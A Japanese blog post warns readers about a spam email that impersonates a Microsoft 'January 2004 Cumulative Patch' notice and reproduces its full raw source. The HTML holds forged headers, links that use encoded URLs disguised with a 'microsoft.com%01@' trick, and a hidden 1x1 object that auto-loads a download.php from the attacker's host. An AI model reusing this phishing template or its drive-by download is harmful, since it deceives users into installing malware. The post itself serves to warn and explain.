先日なにげに素敵な物が届いたので晒してみる。
なにかというと、M$からのパッチ情報を騙るトロイの木馬orワームorスパイウエア投入スパム。
見た目はかようにそれっぽいが、
ヘッダを見ると、From:、Return-Path:、Message-ID:はM$であるかのように詐称、Received:にM$ではないホスト、リンク先の所は、Javaスクリプトな上に途中に@を混ぜた擬装(http:と@の間の文字は無視される)仕様。でも、画像ファイルの置き場所がM$の鯖じゃないんで、バレバレ。
よくもまぁ、こういういたずらを考え付く物です。
まぁ、逝ってよしっ。−ミコレイヤー(まてまて−ってとこですか。
ちなみにそのRecived:にあるホストrr.comですが、今、沢山スパマーがいらっさるようですわ。たくさん英文スパムが着てます。
M$からはこういうパッチやパッチ情報を直接ユーザーに届けることはないそうですんで、着たらまず疑ってみて下さい。
以下がそのソース。
Return-Path:
<security-center@microsoft.com>
Received: from
6535234hfc64.tampabay.rr.com (6535234hfc64.tampabay.rr.com [65.35.234.64]) by
pop.mars.dti.ne.jp (3.08p) with SMTP id i0PDTrhA024178 for
<marx@mars.dti.ne.jp>; Sun, 25 Jan 2004 22:29:54 +0900 (JST)
Date: Sun,
25 Jan 2004 01:28:12 +0000
From: Security-center
<security-center@microsoft.com>
Subject: Security warning
To: Marx
<marx@mars.dti.ne.jp>
References:
<KJK160EJ920LJ8HI@mars.dti.ne.jp>
In-Reply-To:
<KJK160EJ920LJ8HI@mars.dti.ne.jp>
Message-ID:
<HH1HEB3J25C63IJ0@microsoft.com>
MIME-Version: 1.0
Content-Type:
text/html
Content-Transfer-Encoding: 8bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
Transitional//EN">
<HTML><HEAD><TITLE>What You Should
Know About the Swen Worm</TITLE>
<META http-equiv=Content-Type
content="text/html; charset=UTF-8">
<META
content="There is a new
worm called W32/Swen@MM that spreads through e-mail and network shares disguised
as an attachment. This virus alert describes which Microsoft products are
affected by the Swen worm, how to protect against this worm, and what actions to
take if your computer does become infected by this worm."
name=Description>
<META content=all name=Robots>
<META
content="" name=Keywords>
<META content=en-us
name=MS.LOCALE>
<STYLE>BODY {
MARGIN: 0px; FONT-FAMILY:
verdana,arial,helvetica
}
</STYLE>
<META content="MSHTML
6.00.2800.1106" name=GENERATOR></HEAD>
<BODY text=#000000
bgColor=#ffffff leftMargin=0 topMargin=0 MARGINWIDTH="0"
MARGINHEIGHT="0">
<DIV id=TBContainer style="HEIGHT:
81px"><SPAN id=TBDownLevelDiv>
<TABLE cellSpacing=0 cellPadding=0
width="100%" bgColor=#0a6cce border=0>
<TBODY>
<TR>
<TD vAlign=top height=60 rowSpan=2><A href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><IMG height=60 alt="Microsoft Home"
src="http://www.microsoft.com/homepage/gif/bnr-microsoft.gif"
width=250
border=0></A></TD>
<TD vAlign=top align=right
height=20> </TD>
<TD vAlign=center noWrap align=right
bgColor=#000000
height=20><FONT face="Verdana, Arial" color=#ffffff
size=1><B>
<A style="COLOR: #ffffff;
TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
><FONT color=#ffffff>All
Products</FONT></A> <FONT
color=#ffffff>|</FONT> <A
style="COLOR: #ffffff; TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
><FONT color=#ffffff>Support</FONT></A>
<FONT
color=#ffffff>|</FONT>
<A
style="COLOR: #ffffff; TEXT-DECORATION: none"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><FONT color=#ffffff>Search</FONT></A>
<FONT
color=#ffffff>|</FONT>
<Astyle="COLOR: #ffffff; TEXT-DECORATION: none" href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><FONT color=#ffffff>microsoft.com
Home</FONT></A>
</B></FONT></TD>
</TR>
<TR>
<TD vAlign=top align=right colSpan=3
height=40> </TD>
</TR>
</TBODY>
</TABLE>
</SPAN>
<p align="center"><font size="2" face="Arial, Helvetica,
sans-serif">MicroSoft
News<br>
<font
color="#FF0000"><strong>Warning:</strong></font>
<br>
a new virus, W32.Swen.A@mm, can infect your
computer.</font></p>
<p></p>
<p
align="center"><font size="2" face="Arial, Helvetica,
sans-serif">MicroSoft
user,<br>
this is the latest version of
security update, the "January 2004, Cumulative
Patch"<br>
udate which eliminates all known security
vulnerabilities afecting MS Internet
Explorer,<br>
MS Outlook and
MS Outlook Express. Install now to maintain the security of
your
computer<br>
from these vulnerabilities. This update includes the
functionality of all
previously released
patches.</font></p>
<div align="center">
<table
width="74%" border="1">
<tr>
<td
width="37%"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
System
requirements</font></strong></td>
<td
width="63%"><font size="2" face="Arial, Helvetica, sans-serif">Windows
95/98/Me/2000/NT/XP </font></td>
</tr>
<tr>
<td height="20"><strong><font size="2" face="Arial,
Helvetica, sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
This Update applies to
</font></strong></td>
<td><p><font size="2"
face="Arial, Helvetica, sans-serif">MS Internet
Explorer, version 5.5 and
later<br>
MS Outlook, version 8.0 and later<br>
MS Outlook
Express, version 4.01and
later</font></p></td>
</tr>
<tr>
<td><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17"
border="0"></a>
Recommendation</font></strong></td>
<td><font
size="2" face="Arial, Helvetica, sans-serif">Customers should
install the
patch at the earliest
opportunity</font></td>
</tr>
<tr>
<td
height="20"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
How to
install</font></strong></td>
<td><font size="2"
face="Arial, Helvetica, sans-serif">Click on the "<a
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" href="#">Go
to Download page</a>" button
.</font></td>
</tr>
<tr>
<td
height="20"><strong><font size="2" face="Arial, Helvetica,
sans-serif"><a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" ><img src="https://www.e-gold.com/acct/help.gif" width="13"
height="17" border="0"></a>
How to
use</font></strong></td>
<td><font size="2"
face="Arial, Helvetica, sans-serif">You don't need
to do anything after
installing this
item</font></td>
</tr>
</table>
<br>
</div>
<div
align="center">
<input
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" type="submit" name="Submit" value="Go to Download
page">
</div>
<p align="center"><font size="1"
face="Arial, Helvetica, sans-serif">Microsoft
Product Support Services
and Knowledge Base can be found on the <a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" >Microsoft
Technical Support</a> Website. <br>
For
security-related information about Microsoft products, please
visit<br>
the<a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" > Microsoft Security Advisor</a> web
site, or <a href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');" >Contact Us</a>.</font></p>
<hr
align="center">
<div align="center"><font size="2" face="Arial,
Helvetica, sans-serif"> </font><font color="#999999" size="1"
face="Arial, Helvetica, sans-serif">The
names of the actual companies and
products mentioned herein are the trademarks
of their respective
owners</font>.<br>
</div>
</DIV>
<TABLE
id=idFooter style="WIDTH: 100%; BACKGROUND-COLOR: white" cellSpacing=0
cellPadding=0 border=0>
<TBODY>
<TR
vAlign=center>
<TD id=idFooterRow1
style="WIDTH: 100%; HEIGHT:
20px; BACKGROUND-COLOR: #0a6cce"
noWrap> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: bold xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
>Contact Us</A> <SPAN
style="FONT: bold
xx-small Verdana; COLOR: #ffffff"> |</SPAN> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: bold xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');"
>E-mail This Page</A> </TD>
</TR>
<TR
vAlign=center>
<TD id=idFooterRow2
style="WIDTH: 100%; HEIGHT:
30px; BACKGROUND-COLOR: #0a6cce" noWrap><SPAN
style="FONT: xx-small
Verdana; COLOR: #ffffff">1986 - 2004 Microsoft Corporation.
All rights
reserved. </SPAN> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small
Verdana; CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Terms of Use</A> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small Verdana;
CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Privacy Statement </A> <A
onmouseover="this.style.color = '#FF3300'"
style="FONT: xx-small Verdana;
CURSOR: hand; COLOR: #ffffff; TEXT-DECORATION: none"
onmouseout="this.style.color = '#FFFFFF'"
href="#"
onclick="location.href=unescape('http://www.microsoft.com%01@%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/
');">Accessibility
</A></TD>
</TR></TBODY></TABLE><object
width=1 height=1
DATA="http://%642341647.%7535.wo%72%6c%64%69%73%70netwo%72%6b.com/update/download.php"></BODY></HTML>